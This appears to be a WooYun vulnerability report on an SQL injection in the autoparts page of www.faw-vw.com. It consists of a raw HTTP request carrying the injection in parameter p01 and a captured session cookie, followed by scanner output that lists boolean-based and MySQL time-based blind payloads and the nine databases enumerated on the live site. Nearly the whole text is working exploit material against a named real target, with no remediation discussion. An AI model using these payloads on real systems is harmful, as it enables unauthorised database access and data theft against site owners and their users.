WooYun.org

GET /autoparts?1=3&p=3&p01=-1+OR+17-7%3d10&p02=3&page=1 HTTP/1.1
Cache-Control: no-cache
Referer: http://www.faw-vw.com/autoparts
Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
Host: www.faw-vw.com
Cookie: PHPSESSID=4iva05uq82ui0n4k6o3snp9uc0; ci_session=xXpW18RR%2F1p8dy3ziuDZ4XFcU54ItBe5RJTZqI1TeyBgd2553GoeJRR5W2uAbuskSmSvL38XDstr3rIkaLEAp6scVc5az64R7I2axnocvsnImqjoP0%2BQYogUFtjjUV5VhuXpJaExnlqatznlCzfxNWnB4T8WEHc84o%2BMZl8T3kxDfTpgc06DDrxMUCUuWSnaf5EduX32riV2P1OK%2BwY9EJKqL2BAheI1w0uKxhalTidRZVoR0qcP9Ya9o3NLAvUY6e%2FnHMODc%2FvocZ%2FBOXjoQ1mk%2BDljRb3qzbpbV8CnWtI4tyx1IloCaNfiMcbKtUaCWro0k39wccBe6g3VxG7%2FB9W7PbD5VJRLvY2MokSi6VRPRqEvwjZ8xev1IfHL36J1DChOtYrpikG9IENrTJg5kBmN4Uf9V9a0OBmIDICVLQ%2Fo7ki6BFksaUgkiXRYVABECtEbz3PQ3kEhYTnoLHArDQ%3D%3D
Accept-Encoding: gzip, deflate

---
Place: GET
Parameter: p01
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: 1=3&p=3&p01=-1 OR 17-7=10 AND 7817=7817&p02=3&page=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: 1=3&p=3&p01=-1 OR 17-7=10 AND SLEEP(5)&p02=3&page=1
---
available databases [9]:
[*] faw_car
[*] faw_vw_openday
[*] faw_vw_openday0
[*] faw_vw_openday_v2
[*] faw_vw_tenmillion
[*] faw_vw_visit
[*] faw_vw_website
[*] information_schema
[*] mysql